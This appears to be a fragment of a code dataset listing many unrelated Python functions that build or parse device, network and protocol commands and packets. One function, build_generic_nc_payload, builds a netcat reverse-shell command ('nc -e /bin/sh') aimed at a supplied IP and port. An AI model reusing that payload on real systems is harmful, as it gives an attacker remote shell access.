"def issue_binary_command (self, command_id, ch=None, BCAST=0, ALLCH=0, ADDM=0, RW=0, ACT=0, DEXT=0, value_int=0, addr_id_num=0x0000, n_lines_requested=2**31, target_errors=None, output_regex='(.*)', special_timeout = None):\r\n\t\t\r\n\t\t\r\n\t\tdef get_val(i):\r\n\t\t\t\"\"\"Function to convert uint16 to bytearray([uint8,uint8])\"\"\"\r\n\t\t\treturn bytearray([int(i/256),int(i)-int(i/256)*256])\r\n\t\t\r\n\t\tdef parity_odd(x):\r\n\t\t\t\"\"\"Function to compute whether a byte's parity is odd.\"\"\"\r\n\t\t\tx = x ^ (x >> 4)\r\n\t\t\tx = x ^ (x >> 2)\r\n\t\t\tx = x ^ (x >> 1)\r\n\t\t\treturn x & 1\r\n\t\t\r\n\t\t\r\n\t\t# Format header byte\r\n\t\theader_byte = 0x80\r\n\t\theader_byte += BCAST*0x40\r\n\t\theader_byte += ALLCH*0x20\r\n\t\theader_byte += ADDM*0x10\r\n\t\theader_byte += RW*0x08\r\n\t\theader_byte += ACT*0x04\r\n\t\theader_byte += DEXT*0x02\r\n\t\theader_byte += parity_odd(header_byte)\r\n\t\t\r\n\t\t\r\n\t\t# Format command byte\r\n\t\tif isinstance(command_id, str):\r\n\t\t\tcommand_byte = CMD_CODES[command_id.upper()]\r\n\t\telif isinstance(command_id, int):\r\n\t\t\tcommand_byte = command_id\r\n\t\t\r\n\t\t\r\n\t\t# Format channel address\r\n\t\taddress_bytes = bytearray()\r\n\t\tif ch is None:\r\n\t\t\tch = 0\r\n\t\tif ADDM == 1:\r\n\t\t\taddress_bytes.extend(get_val(addr_id_num))\r\n\t\t\taddress_bytes.append(ch)\r\n\t\telif ADDM == 0:\r\n\t\t\taddress_bytes.append(0)\r\n\t\t\taddress_bytes.extend(get_val(ch))\r\n\t\t\r\n\t\t\r\n\t\t# Format value bytes\r\n\t\t# value_int can be either an int or a list of ints (for vectorised input, DEXT = 1)\r\n\t\tdata_bytes = bytearray()\r\n\t\t\r\n\t\tif DEXT == 1:\r\n\t\t\t# Handle data extension length\r\n\t\t\tif isinstance(value_int, list):\r\n\t\t\t\tn_dext_words = len(value_int)\r\n\t\t\telse:\r\n\t\t\t\tn_dext_words = 1\r\n\t\t\tif n_dext_words > 0xFFFF:\r\n\t\t\t\tn_dext_words = 0xFFFF\r\n\t\t\tdata_bytes.extend(get_val(n_dext_words))\r\n\t\t\r\n\t\tif isinstance(value_int, int):\r\n\t\t\tdata_bytes.extend(get_val(value_int))\r\n\t\t\r\n\t\telif isinstance(value_int, list) and all([isinstance(e ,int) for e in value_int]):\r\n\t\t\tfor i,e in enumerate(value_int):\r\n\t\t\t\tdata_bytes.extend(get_val(e))\r\n\t\t\t\tif i == n_dext_words:\r\n\t\t\t\t\tbreak\r\n\t\t\r\n\t\telse:\r\n\t\t\traise AttributeError(\"value_int must be of type int, or of type list with all elements of type int (received type {:})\".format(type(value_int) ) )\r\n\t\t\r\n\t\t\r\n\t\t# Compose command byte string\r\n\t\ttx_str = bytearray()\r\n\t\ttx_str.append(header_byte)\t\t\t\t# Header byte\r\n\t\ttx_str.append(command_byte)\t\t\t\t# Command byte\r\n\t\ttx_str.extend(address_bytes)\t\t\t# Three bytes of channel address\r\n\t\ttx_str.extend(data_bytes)\t\t\t\t# 2 (DEXT=0) or 2*N+1 (DEXT=1) bytes of data\r\n\t\t\r\n\t\t# Transmit it\r\n\t\tself.transmit(tx_str, binary_mode = True)\r\n\t\t\r\n\t\t\r\n\t\t# Function to retry this command (in case of comms error)\r\n\t\tdef retry_function():\r\n\t\t\treturn self.issue_binary_command (command_id, ch, BCAST, ALLCH, ADDM, RW, ACT, DEXT, value_int, addr_id_num, n_lines_requested, target_errors, output_regex, special_timeout)\r\n\t\t\r\n\t\t# Wait for response\r\n\t\tif RW==1 or ((RW==0 or ACT) and self.wait_for_responses):\r\n\t\t\ttry:\r\n\t\t\t\tresult = self._issue_command_receive_response (retry_function, n_lines_requested, target_errors, output_regex, special_timeout)\r\n\t\t\t\treturn result\r\n\t\t\texcept RuntimeError as e:\r\n\t\t\t\tif RW == 1:\r\n\t\t\t\t\t# If we want a return value, raise an 
error\r\n\t\t\t\t\traise RuntimeError (\"Failed to read with command '{0}'. {1}\".format(tx_str, e))\r\n\t\t\t\telse:\r\n\t\t\t\t\t# If we are setting something, just warn the user\r\n\t\t\t\t\tprint(\"Qontroller.issue_command: Warning: Failed to write with command '{0}'. {1}\".format(tx_str, e))\r\n\t\t\t\t\treturn None",
"def construct_message(self):\n msg_type = self.msg_type\n if msg_type == \"PUBMSG\":\n msg_type = \"PRIVMSG\"\n ret = \"{} {}\".format(msg_type, self.target)\n if self.content:\n ret += \" :{}\".format(self.content)\n return ret + \"\\r\\n\"",
"def make_packet(message, host):\n\tRESOURCE = \"/\"\t\t\t\t# dummy resource\n\t\n\t# First line is the request\n\trequest = HTTPConstants.GET_REQUEST + \" \" + RESOURCE + \" \" + HTTPConstants.VERSION + HTTPConstants.CRLF\n\t\n\t# Next are the headers\n\theaders = \"Host: {0}\".format(host) + HTTPConstants.CRLF\n\t\n\t# Construct the head\n\thead = request + headers\n\t\n\t# Construct the body\n\tbody = message + HTTPConstants.CRLF\n\t\n\t# Assembly into a packet, where the head and body (message) are separated by a blank line (CRLF), and the EOM is\n\t# denoted by a blank line\n\treturn head + HTTPConstants.CRLF + body + HTTPConstants.CRLF",
"def _build_command_user_data_message(self, command_payload) -> LocalServerInfo_pb2.LocalServerMessage:\n magic_number = self._get_magic_number()\n message = LocalServerInfo_pb2.LocalServerMessage()\n message.magic_num = magic_number\n message.localcode = self.local_code\n message.c.type = 0\n message.c.usr_data = command_payload\n\n return message",
"def createPacket(id):\n\n # Header is type (8), code (8), checksum (16), id (16), sequence (16)\n header = getHeaderData(0, id)\n\n data = 192 * 'Q'\n\n checksum = getChecksum(header + data)\n\n header = getHeaderData(socket.htons(checksum), id)\n\n return header + data",
"def sendScratchCommand(self, command):\n if sys.version[0] == \"2\":\n self.socket.send(self.getPacketLengthBytes(command) + command)\n elif sys.version[0] == \"3\":\n self.socket.send(self.getPacketLengthBytes(command) + command.encode('utf-8'))",
"def _generate_payload(self, command, data=None, gwId=None, devId=None, uid=None):\n json_data = command_override = None\n\n if command in payload_dict[self.dev_type]:\n if \"command\" in payload_dict[self.dev_type][command]:\n json_data = payload_dict[self.dev_type][command][\"command\"]\n if \"command_override\" in payload_dict[self.dev_type][command]:\n command_override = payload_dict[self.dev_type][command][\n \"command_override\"\n ]\n\n if self.dev_type != \"type_0a\":\n if (\n json_data is None\n and command in payload_dict[\"type_0a\"]\n and \"command\" in payload_dict[\"type_0a\"][command]\n ):\n json_data = payload_dict[\"type_0a\"][command][\"command\"]\n if (\n command_override is None\n and command in payload_dict[\"type_0a\"]\n and \"command_override\" in payload_dict[\"type_0a\"][command]\n ):\n command_override = payload_dict[\"type_0a\"][command][\"command_override\"]\n\n if command_override is None:\n command_override = command\n if json_data is None:\n # I have yet to see a device complain about included but unneeded attribs, but they *will*\n # complain about missing attribs, so just include them all unless otherwise specified\n json_data = {\"gwId\": \"\", \"devId\": \"\", \"uid\": \"\", \"t\": \"\"}\n\n if \"gwId\" in json_data:\n if gwId is not None:\n json_data[\"gwId\"] = gwId\n else:\n json_data[\"gwId\"] = self.id\n if \"devId\" in json_data:\n if devId is not None:\n json_data[\"devId\"] = devId\n else:\n json_data[\"devId\"] = self.id\n if \"uid\" in json_data:\n if uid is not None:\n json_data[\"uid\"] = uid\n else:\n json_data[\"uid\"] = self.id\n if \"t\" in json_data:\n if json_data[\"t\"] == \"int\":\n json_data[\"t\"] = int(time.time())\n else:\n json_data[\"t\"] = str(int(time.time()))\n\n if data is not None:\n if \"dpId\" in json_data:\n json_data[\"dpId\"] = data\n elif \"data\" in json_data:\n json_data[\"data\"] = {\"dps\": data}\n else:\n json_data[\"dps\"] = data\n elif self.dev_type == \"type_0d\" and command == DP_QUERY:\n json_data[\"dps\"] = self.dps_to_request\n\n if json_data == \"\":\n payload = \"\"\n else:\n payload = json.dumps(json_data)\n # if spaces are not removed device does not respond!\n payload = payload.replace(\" \", \"\").encode(\"utf-8\")\n self.debug(\"Sending payload: %s\", payload)\n\n return MessagePayload(command_override, payload)",
"def build_message(self, dict_of_tuples, command, uuid, transaction_id=b'\\x00'):\n\t\t# NOTE: uuid must be a byte array\n\t\t# available app_message commands:\n\t\tapp_messages = {\n\t\t\t\"PUSH\": b'\\x01',\n\t\t\t\"REQUEST\": b'\\x02',\n\t\t\t\"ACK\": b'\\xFF',\n\t\t\t\"NACK\": b'\\x7F'\n\t\t}\n\t\t# finally build the entire message\n\t\tapp_message = OrderedDict([\n\t\t\t(\"COMMAND\", app_messages[command]),\n\t\t\t(\"TRANSACTIONID\", transaction_id),\n\t\t\t(\"UUID\", uuid),\n\t\t\t(\"DICT\", ''.join(dict_of_tuples.values()))\n\t\t])\n\t\treturn ''.join(app_message.values())",
"def build_packets(self):\n from scapy.all import IP, TCP\n return IP()/TCP()",
"def _read_packet_from_device(self, adb_info):\n msg = self._read_bytes_from_device(constants.MESSAGE_SIZE, adb_info)\n cmd, arg0, arg1, data_length, data_checksum = unpack(msg)\n command = constants.WIRE_TO_ID.get(cmd)\n\n if not command:\n raise exceptions.InvalidCommandError(\"Unknown command: %d = '%s' (arg0 = %d, arg1 = %d, msg = '%s')\" % (cmd, int_to_cmd(cmd), arg0, arg1, msg))\n\n if data_length == 0:\n return command, arg0, arg1, b\"\"\n\n data = self._read_bytes_from_device(data_length, adb_info)\n actual_checksum = checksum(data)\n if actual_checksum != data_checksum:\n raise exceptions.InvalidChecksumError(\"Received checksum {} != {}\".format(actual_checksum, data_checksum))\n\n return command, arg0, arg1, data",
"def send_simple_command(self, cmd):\n pkt = MqttPkt()\n \n pkt.command = cmd\n pkt.remaining_length = 0\n \n ret = pkt.alloc()\n if ret != NC.ERR_SUCCESS:\n return ret\n \n return self.packet_queue(pkt)",
"def command_create(self):\n command = []\n for macro in self.my_xml.tool_data[self.shell_dict['short_name']]['pre_tmpls']:\n command.append(self.my_xml.chth_tmpl.substitute(macro=macro))\n command.extend(self.pre_chth)\n command.append(Template('@CMD_BEGIN@ $short_name').substitute(self.shell_dict))\n command.extend(self.tool_chth)\n for macro in self.my_xml.tool_data[self.shell_dict['short_name']]['post_tmpls']:\n command.append(self.my_xml.chth_tmpl.substitute(macro=macro))\n\n return '\\n'.join(command)",
"def test_commandRepr(self):\n repr(imap4.Command(b\"COMMAND\", [b\"arg\"], (b'extra')))",
"def encode(self):\n packed = struct.pack(\"<2Bl\",\n self.device_number,\n self.command_number,\n self.data)\n if self.message_id is not None:\n packed = packed[:5] + struct.pack(\"B\", self.message_id)\n return packed",
"def test_build_full_command(self):\n actual_result = IperfClientCommandBuilder() \\\n .set_server_ip(SERVER_IP)\\\n .set_port('22')\\\n .set_mode_udp(IPERF_MODE)\\\n .set_time_interval(INTERVAL)\\\n .set_testing_time(TIME) \\\n .build_client_command()\n self.assertListEqual(actual_result,\n ['iperf', '-c', '192.168.1.1', '-u',\n '-p', '22', '-t', '30', '-i', '5'])",
"def create_command_from_request(request: RequestInterface):",
"def create_command(command: str, *parameters) -> str:\n if parameters and isinstance(parameters, tuple) and isinstance(parameters[0], tuple):\n parameters = parameters[0]\n str_param: str = ' '.join([str(param) for param in parameters]) if parameters else \"\"\n result = command+' ' + str_param + '\\r\\n' if str_param else command + '\\r\\n'\n return result",
"def create_packet(id, seq, data_size):\n\n # Random sequence of characters.\n payload = ''\n for k in range(data_size):\n payload += chr(random.randint(65, 65+25))\n\n # Create ICMP echo packet.\n echo = dpkt.icmp.ICMP.Echo()\n echo.id = id\n echo.seq = seq\n echo.data = payload\n\n icmp = dpkt.icmp.ICMP()\n icmp.type = dpkt.icmp.ICMP_ECHO\n icmp.data = echo\n\n # Return data packet as string representation.\n packet = str(icmp)\n\n # Done.\n return (payload, packet)",
"def _get_cmd(cls, command, f_config, verbose=False):\n if command not in cls.COMMANDS:\n raise KeyError('Could not recongize command \"{}\". '\n 'Available commands are: {}'\n .format(command, cls.COMMANDS))\n cmd = cls.CMD_BASE.format(fp_config=f_config, command=command)\n if verbose:\n cmd += ' -v'\n\n return cmd",
"def serialize(self):\n\n # The len must be multiple of 4 bits to convert unambiguously\n\n id_len = self.id.bit_length()\n while (id_len % 4)!= 0:\n id_len += 1\n if self.payload:\n pay_len = self.payload.bit_length()\n while (pay_len % 4)!= 0:\n pay_len += 1\n else: pay_len = 0\n if self.command:\n com_len = self.command.bit_length()\n while (com_len % 4)!= 0:\n com_len += 1\n else: com_len = 0\n\n values = {\n \"id\": self.id,\n \"id_len\": id_len,\n \"payload\": self.payload,\n \"payload_len\": pay_len,\n \"command\": self.command,\n \"command_len\": com_len\n }\n\n\n if self.id == Message.MEASURE or self.id == Message.SINGLE_MEASURE:\n serial_format = (\n \"uint:id_len=id, bits:payload_len=payload, bits:command_len = command, 0x0D0A\"\n )\n else:\n serial_format = (\n \"0x23, uint:id_len=id, bits:payload_len=payload, bits:command_len = command, 0x0D0A\"\n )\n\n message = bitstring.pack(serial_format, **values)\n\n rospy.logdebug(\"Sent command '0x%s'\", message.hex)\n\n return message.tobytes()",
"def _packet_string(self):\n return 'Packet (Length: %s)%s' % (self.length, os.linesep)",
"def add_command(self, command, length, format_string): \n \n # see if no new commands have been added\n if self.no_commands:\n \n # empty the dictionary\n self.SCPI_Data = {} \n \n # set the updated flag\n self.no_commands = False\n # end if\n \n # check if the command is valid\n if length.isdigit() and is_valid_format(format_string):\n if int(length) > 0:\n # the command is valid so proceed\n \n # define list of keys to use\n keys = [command + ',name', command + ',data',\n command + ',length', command + ',ascii']\n \n # define list of bbyte lengths to use\n key_bytes = [# name length\n self.wflag_size + self.time_size + \\\n self.name_size + self.chksum_size,\n # data length\n self.wflag_size + self.time_size + \\\n self.chksum_size + int(length),\n # length length\n self.wflag_size + self.time_size + \\\n self.length_size + self.chksum_size,\n # ascii length\n self.wflag_size + self.time_size + \\\n self.chksum_size + self.ascii_size]\n \n # define list of formats\n formats = ['ascii', format_string, 'uint', 'ascii']\n \n # construct the four scpi commands for each command\n for i in range(0,4):\n \n # check if the command already exists in the library\n if keys[i] not in self.SCPI_Data:\n # it doesnt so add it\n self.SCPI_Data[keys[i]] = [key_bytes[i], \n formats[i]]\n \n elif (i == 0):\n self.error_log.append('*** ' + command + \n ' already in library ***') \n # end if \n # end for\n \n else:\n self.error_log.append('*** ' + command + \n ' length is too short ***') \n # end if\n \n else:\n self.error_log.append('*** ' + command + \n ' length or format is invalid ***') \n # end if",
"def _extract_command(fields: List[bytes]) -> Tuple[Any, List[Any]]:\n cmd = encode_command(fields[0])\n if cmd in COMMANDS_WITH_SUB and len(fields) >= 2:\n cmd += \" \" + encode_command(fields[1])\n cmd_arguments = fields[2:]\n else:\n cmd_arguments = fields[1:]\n return cmd, cmd_arguments",
"def buildPackets(self):\n return self.input",
"def build_generic_nc_payload(revshell_ip, revshell_port) -> str:\n return 'nc -e /bin/sh {} {}'.format(revshell_ip, revshell_port)",
"def cmd_parse(self, cmd):\n chan = (cmd & 0x200) >> 8\n val = cmd & 0xff\n return 'w'+str(chan)+'.v'+str(value)",
"def _build_packet_out(self, datapath, buffer_id, src_port, dst_port, data):\r\n actions = []\r\n if dst_port:\r\n actions.append(datapath.ofproto_parser.OFPActionOutput(dst_port))\r\n\r\n msg_data = None\r\n if buffer_id == datapath.ofproto.OFP_NO_BUFFER:\r\n if data is None:\r\n return None\r\n msg_data = data\r\n\r\n out = datapath.ofproto_parser.OFPPacketOut(\r\n datapath=datapath, buffer_id=buffer_id,\r\n data=msg_data, in_port=src_port, actions=actions)\r\n return out",
"def pack(self):\n\n msg = struct.pack(SentmanRequest.FORMAT,\n self.version, self.op_type, self.msg_len)\n return msg",
"def send_cmd(self, cmd, *args):\n self.write_pkt_line(cmd + b\" \" + b\"\".join([(a + b\"\\0\") for a in args]))",
"def translate_to_binary(command):\r\n int_command = int(command)\r\n binary_command = bin(int_command)[2:]\r\n missing_bits = CMD_LEN - len(binary_command)\r\n cmd_prefix = missing_bits * str(0)\r\n binary_command = str(cmd_prefix) + str(binary_command)\r\n return binary_command + \"\\n\"",
"def test_cmd_builder(self):\n test_conf = '/tmp/test'\n expected_cmd = ['calabar_vpnc', test_conf]\n\n cmd = self.t._build_cmd(test_conf, None)\n self.assertTrue(cmd, expected_cmd)",
"def build_irc_msg(command, params, final_param_multi_word=False,\n source=None):\n\n if final_param_multi_word:\n final_param = ':' + params[-1]\n else:\n final_param = params[-1]\n\n if source:\n prefix = ':' + source\n else:\n prefix = ''\n\n if len(params) > 1:\n parts = [prefix, command, ' '.join(params[:-1]), final_param]\n else:\n parts = [prefix, command, final_param]\n\n return ' '.join(parts).strip() + '\\r\\n'",
"def command(s_socket):\r\n command = raw_input(\"#> \")\r\n bytes_value = to_bytes(len(command) + 5, 4, 'little')\r\n s_socket.send('c' + bytes_value + command)\r\n\r\n print(s_socket.recv(MAX_BUFFER_LENGTH))",
"def __init__(self, command: str, data, checksum: bool):\r\n self.command = command\r\n \"\"\"Command to perform\"\"\"\r\n self.checksum = checksum\r\n \"\"\"Checksum protocol mode.\"\"\"\r\n self.data = data\r\n \"\"\"Data for PWM (or SET for closed loop) command.\"\"\"",
"def build_commands(self):\n commands_dict = {}\n for k in (self.__class__.__dict__.keys() + IrcStatusBot.__dict__.keys()):\n if k.startswith('command_'):\n commands_dict[k[8:].lower()] = None\n commands = commands_dict.keys()\n commands.sort()\n return commands",
"def buildReq(cmd, target, sequence, fieldList):\n return buildCmd(\"REQ\", cmd, target, sequence, fieldList)",
"def _create_commands(self, data):\n lines = []\n idone, odone = False, False\n for line in data.split(b'\\n'):\n if line.startswith(b'@intext'):\n if self.inputastext is None:\n self.metadata['inputastext'] = True\n self.inputastext = True\n idone = True\n elif line.startswith(b'@outtext'):\n if self.outputastext is None:\n self.metadata['outputastext'] = True\n self.outputastext = True\n odone = True\n else:\n # remove eventual comment\n m = re.match(br'(.*?);', line)\n if m:\n line = m.group(1)\n line = line.rstrip()\n if line:\n lines.append(line)\n if not idone:\n if self.inputastext:\n self.metadata['inputastext'] = True\n if not odone:\n if self.outputastext:\n self.metadata['outputastext'] = True\n if not lines:\n raise CarError('no source code')\n min_indent = len(lines[0]) # temporary\n for line in lines:\n indent = len(line) - len(line.lstrip())\n if indent == 0:\n break\n if indent < min_indent:\n min_indent = indent\n else:\n lines = tuple(x[min_indent:] for x in lines)\n\n #self.raw_board = '\\n'.join(lines) # for an eventual curses simulator\n\n board = []\n has_car, has_exit = False, False\n y = 0\n for line in lines:\n row = array.array('B')\n x = 0\n for c in line:\n try:\n op = _opcode_to_const_map[c]\n except KeyError:\n op = NOP\n if op == CAR:\n if has_car:\n raise CarError('program can only have one car')\n has_car = True\n car_pos = (x, y)\n row.append(NOP)\n else:\n row.append(op)\n if op == EXIT:\n if has_exit:\n raise CarError('program can only have one exit')\n has_exit = True\n x += 1\n board.append(row)\n y += 1\n if not has_car:\n raise CarError('program must have one car')\n if not has_exit:\n raise CarError('program must have one exit')\n return self._board_to_commands(board, car_pos)",
"def __bytes__(self):\n return pack(\"<HH\", self._packet_len, self._control_ctr)",
"def build_cmd(self, cmd_list: List[Optional[str]], input_symbol: str = \"@@\") -> List[Optional[str]]:\n\n # initialize command with harness binary and DeepState flags to pass to it\n cmd_list.extend([\n \"--\", self.binary,\n \"--input_test_file\", input_symbol,\n \"--abort_on_fail\",\n \"--no_fork\",\n \"--min_log_level\", str(self.min_log_level)\n ])\n\n # append any other DeepState flags\n for key, val in self.target_args:\n if len(key) == 1:\n cmd_list.append('-{}'.format(key))\n else:\n cmd_list.append('--{}'.format(key))\n if val is not None:\n cmd_list.append(val)\n\n # test selection\n if self.which_test:\n cmd_list.extend([\"--input_which_test\", self.which_test])\n\n return cmd_list",
"def format_message(command_code, body=b''):\n return bytes([MESSAGE_START_BYTE, command_code.value]) + body",
"def _collect_command(self, command_element):\n command_name = GLGenerator.get_command_name(command_element)\n #print(f'Command: {command_name}')\n\n if command_name not in self.command_list:\n return\n\n if not self._command_should_collect(command_name):\n return\n\n func_prefix_len = len(self.func_prefix)\n\n proto_element = command_element.find('proto')\n proto_info = self._parse_node(proto_element)\n native_name = proto_info.name\n short_name = native_name[func_prefix_len:]\n wrapper_name = GLGenerator.wrapper_function_name(command_name)\n native_return_type = proto_info.native_type\n wrapper_return_type = proto_info.wrapper_type\n capture_result = ''\n native_return_statement = ''\n wrapper_return_statement = ''\n if native_return_type != 'void':\n capture_result = 'auto res = '\n native_return_statement = ' return res;\\n'\n wrapper_return_statement = f' return static_cast<{wrapper_return_type}>(res);\\n'\n\n native_params = []\n wrapper_params = []\n format_strings = []\n format_entries = []\n argument_list = []\n native_arg_type_list = []\n wrapper_arg_type_list = []\n\n for param in command_element.findall('param'):\n param_info = self._parse_node(param)\n param_name = param_info.name\n native_params.append(param_info.native_type + ' ' + param_name)\n wrapper_params.append(param_info.wrapper_type + ' ' + param_name)\n native_arg_type_list.append(param_info.native_type)\n wrapper_arg_type_list.append(param_info.wrapper_type)\n format_strings.append(param_info.format_string)\n format_entries.append(param_info.format_entry)\n if param_info.is_pointer:\n argument_list.append(f'reinterpret_cast<{param_info.native_type}>({param_name})')\n else:\n argument_list.append(f'static_cast<{param_info.native_type}>({param_name})')\n\n log_format_entries = ''\n if len(format_entries) > 0:\n separator = ',\\n '\n log_format_entries = separator + separator.join(format_entries)\n\n formatting = {\n 'COMMAND_NAME': command_name,\n 'SHORT_NAME': short_name,\n 'NATIVE_RETURN_TYPE': native_return_type.strip(),\n 'NATIVE_NAME': native_name,\n 'NATIVE_ARGUMENTS': ', '.join(native_params),\n 'NATIVE_ARG_TYPE_LIST': ', '.join(native_arg_type_list),\n 'NATIVE_RETURN_STATEMENT': native_return_statement,\n 'COMMAND_VERSION': self._command_version(command_name),\n\n 'WRAPPER_RETURN_TYPE': wrapper_return_type.strip(),\n 'WRAPPER_NAME': wrapper_name,\n 'WRAPPER_ARGUMENTS': ', '.join(wrapper_params),\n 'WRAPPER_ARG_TYPE_LIST': ', '.join(wrapper_arg_type_list),\n 'WRAPPER_RETURN_STATEMENT': wrapper_return_statement,\n\n 'LOG_FORMAT_STRING': ', '.join(format_strings),\n 'LOG_FORMAT_ENTRIES': log_format_entries,\n 'CAPTURE_RESULT': capture_result,\n 'ARGUMENT_LIST': ', '.join(argument_list),\n }\n\n wrapper_function_declaration = templates.WRAPPER_FUNCTION_DECLARATION.format(**formatting)\n self.wrapper_function_declarations.append(wrapper_function_declaration)\n\n wrapper_function_definition = templates.WRAPPER_FUNCTION_DEFINITION.format(**formatting)\n self.wrapper_function_definitions.append(wrapper_function_definition)\n\n for feature in self.command_required_by_feature.get(command_name, []):\n number = feature[\"number\"]\n self.command_info_entries += (\n f' check_version(Command::Command_{command_name}, {number});\\n'\n )\n\n for extension in self.command_required_by_extension.get(command_name, []):\n extension_name = extension[\"name\"]\n self.command_info_entries += (\n f' check_extension(Command::Command_{command_name}, '\n f'Extension::Extension_{extension_name});\\n'\n )\n\n decl_entry = 
templates.DYNAMIC_LOAD_FUNCTION_DECLARATION .format(**formatting)\n defn_entry = templates.DYNAMIC_LOAD_FUNCTION_DEFINITION .format(**formatting)\n get_entry = templates.DYNAMIC_LOAD_FUNCTION_GET_STATEMENT.format(**formatting)\n self.dynamic_function_declarations .append(decl_entry)\n self.dynamic_function_definitions .append(defn_entry)\n self.dynamic_function_get_statements.append(get_entry)",
"def test_build_command(self):\n actual_result = IperfServerCommandBuilder().build_server_command()\n self.assertListEqual(actual_result, ['iperf', '-s'])",
"def genCmd(self, cmdinfo, name, alias):\n OutputGenerator.genCmd(self, cmdinfo, name, alias)\n\n # Add a typeCategory{} entry for the category of this type.\n self.addName(self.typeCategory, name, 'protos')\n\n if alias:\n # Add name -> alias mapping\n self.addName(self.alias, name, alias)\n else:\n # May want to only emit definition on this branch\n True\n\n params = [param.text for param in cmdinfo.elem.findall('param/name')]\n self.protos[name] = params\n paramTypes = [param.text for param in cmdinfo.elem.findall('param/type')]\n for param_type in paramTypes:\n self.addMapping(name, param_type)",
"def create_ui_commands(pcm_speed, hud, idx):\n commands = []\n pcm_speed_real = clip(int(round(pcm_speed / 0.002759506)), 0,\n 64000) # conversion factor from dbc file\n msg_0x30c = struct.pack(\"!HBBBBB\", pcm_speed_real, hud.pcm_accel,\n hud.v_cruise, hud.X2, hud.car, hud.X4)\n commands.append(make_can_msg(0x30c, msg_0x30c, idx, 0))\n\n msg_0x33d = chr(hud.X5) + chr(hud.lanes) + chr(hud.beep) + chr(hud.X8)\n commands.append(make_can_msg(0x33d, msg_0x33d, idx, 0))\n # if car_fingerprint in (CAR.CIVIC, CAR.ODYSSEY):\n msg_0x35e = chr(0) * 7\n commands.append(make_can_msg(0x35e, msg_0x35e, idx, 0))\n msg_0x39f = (chr(0) * 2 + chr(hud.acc_alert) +\n chr(0) + chr(0xff) + chr(0x7f) + chr(0))\n commands.append(make_can_msg(0x39f, msg_0x39f, idx, 0))\n return commands",
"def create_gas_command(gas_amount, idx):\n # enable_bit = 1 << 7\n # max_gas = 176.526\n # offset = -83.3\n # scaled_offset = offset / 1023.0 * max_gas\n # offset_raw = 21\n # offset2_raw = 11\n # print(offset_raw)\n # print(scaled_offset)\n # gas_amount_ = (float(gas_amount) / 1023.0) * max_gas\n # print(gas_amount_)\n # gas_amount_2 = (float(gas_amount) / 1023.0) * max_gas / 2.0\n # gas_amount_ = gas_amount_ + offset_raw\n # print(gas_amount_)\n # gas_amount_2 = gas_amount_2 + offset2_raw\n\n # gas_amount_ = int(gas_amount_ / max_gas * 1023.0)\n # gas_amount_2 = int(gas_amount_2 / max_gas * 1023.0)\n # print(\"gas 1 gas 2\")\n # print(gas_amount_)\n # print(gas_amount_2)\n\n offset1_raw = 328 # 21\n offset2_raw = 656 # 11\n gas_amount_1 = gas_amount + offset1_raw\n gas_amount_2 = gas_amount * 2 + offset2_raw\n if gas_amount <= 0:\n enable_bit = 0\n else:\n enable_bit = 1 << 7\n\n if gas_amount <= 0:\n enable_bit = 0\n msg = struct.pack(\"!HHB\", gas_amount_1, gas_amount_2, enable_bit)\n return make_can_msg(0x200, msg, idx, 0)",
"def add_command(self, name, command):\n if command['type'] == 'topic':\n if 'deadman_buttons' not in command:\n command['deadman_buttons'] = []\n command['buttons'] = command['deadman_buttons']\n if 'deadman_axes' not in command:\n command['deadman_axes'] = []\n command['axes'] = command['deadman_axes']\n elif command['type'] == 'action':\n if 'action_goal' not in command:\n command['action_goal'] = {}\n elif command['type'] == 'service':\n if 'service_request' not in command:\n command['service_request'] = {}\n self.command_list[name] = command",
"def cmd_from_binary(binary_string):\n cmd = Command()\n if binary_string[:2] != cmd.PREAMBLE:\n raise ValueError('Invalid command preamble in: {0}'.format(binary_string))\n if binary_string[2] != cmd.CONTROLLER_ADDRESS or binary_string[3] != cmd.TRANSCEIVER_ADDRESS:\n raise ValueError('Invalid controller/transceiver addresses: {0}'.format(binary_string[2:4]))\n\n cmd.cmd_num = binary_string[4]\n\n # how will we know if there's a subcommand?",
"def makecmd(self, options):",
"def send_command_bytes_usb(self, data, response_header = False):\n checksum = 0\n\n for d in data:\n checksum += ord(d)\n\n # Construct the packet.\n # NOTE: If you want the response header use 0xf9; \n # for no response header (see below) use 0xf7\n packet = chr(0xf7)\n\n if response_header:\n packet = chr(0xf9)\n\n packet += data+chr(checksum % 256)\n self.port.write(packet.encode('latin-1'))",
"def command(self, inst_data: int, buf: bytes, /) -> None:",
"def _pack(self) -> bytes:\n\n return struct.pack(\n self.PACKAGING_FORMAT, \n self.first_operand, \n self.operator, \n self.type_of_second_operand, \n self.second_operand, \n self.length\n )",
"def create_command(self, on_or_off: bool, port: int):\n return self.power_strip.create_command(port, on_or_off)",
"def get_command(self, offset):\n cmd = struct.unpack_from('!I', self.string, offset=offset)[0]\n # if cmd not in [1,2,3,4,9]:\n # raise ValueError('Command not recognised')\n offset += struct.calcsize('!I')\n return cmd, offset",
"def buildCommand(self, kwargs):\r\n self.command = \"\"\r\n try:\r\n if not self.isEnabled():\r\n return\r\n except Exception, e:\r\n print \"<ERROR>\", e\r\n return\r\n self.command = self.app\r\n \r\n \r\n \r\n # filename should be last in the command, so iterate again\r\n for key in kwargs:\r\n if key == 'filename':\r\n if type(kwargs[key]) == str:\r\n f = kwargs[key]\r\n if os.path.exists(f):\r\n self.command += \" \" + str(f)\r\n else:\r\n self.command = \"\"\r\n raise Exception, \"File does not exist!\"\r\n else:\r\n self.command = \"\"\r\n raise Exception, \"File needs to be a string.\"",
"def _build_solo_command(self, cmd):\n return COMMAND_CHAR[cmd]",
"def send_command(self, command):\n send_message = \"\"\n for i in command:\n send_message += chr(i)\n #send_message += bytes(i)\n\n for data in send_message:\n self.pymata.transport.write(data)",
